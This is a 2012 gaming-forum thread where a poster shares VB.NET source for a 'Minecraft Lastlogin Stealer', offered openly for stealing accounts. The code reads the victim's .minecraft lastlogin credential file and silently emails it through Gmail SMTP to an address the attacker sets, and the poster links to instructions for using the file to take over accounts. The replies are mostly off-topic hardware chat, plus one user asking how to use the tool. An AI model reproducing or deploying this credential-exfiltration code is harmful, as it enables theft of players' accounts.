Post: Minecraft Lastlogin Stealer [Open Source]
05-29-2012, 09:36 PM #1
(adsbygoogle = window.adsbygoogle || []).push({});
Minecraft Lastlogin Stealer



Do to constant requests here it is. A lastlogin stealer. It did not take long to make either. So basically all it does is finds the last login file and emails it to the account that you set up. Please remember that with with this specific code the email account must be a Gmail account. Hope you guys enjoy this.


Go You must login or register to view this content. to learn how to use the last log in file to steal an account.


VB.NET


    

Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.Subject = ("LastLoginFile")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR="#FF0000"]"[email protected]"[/COLOR], [COLOR="#FF0000"]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class




I will not spoon feed anyone. If you can not use this code alone to make a program, then you need to go take some beginner tutorials. Then come back and ask me your questions.
(adsbygoogle = window.adsbygoogle || []).push({});

The following user thanked MagicalMonkey for this useful post:

Pichu
06-16-2012, 01:46 AM #11
Pichu
RIP PICHU.
Originally posted by MagicalMonkey View Post
Oh. I love the i7. It's so fast! Also the i5 isn't that bad either. Smile


i3 = alright i5 = bit better than alright i7 = excellent.

The following user thanked Pichu for this useful post:

MagicalMonkey
06-16-2012, 01:55 AM #12
Originally posted by Pichu View Post
i3 = alright i5 = bit better than alright i7 = excellent.


Yeah I agree. The difference between an i5 and an i7 is extraordinary. Hey if you want to further discuss this send me a friend request on skype. ForR33l
06-16-2012, 02:05 AM #13
Pichu
RIP PICHU.
Originally posted by MagicalMonkey View Post
Yeah I agree. The difference between an i5 and an i7 is extraordinary. Hey if you want to further discuss this send me a friend request on skype. ForR33l


I don't have Skype anymore but will reinstall it when I have the money for the computer. Mlackey94 is my Skype.

The following user thanked Pichu for this useful post:

MagicalMonkey
06-10-2014, 09:23 AM #14
sorry to be the ONE person who does this.... but does anyone know an easy way to understand how to use this??
Sal

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo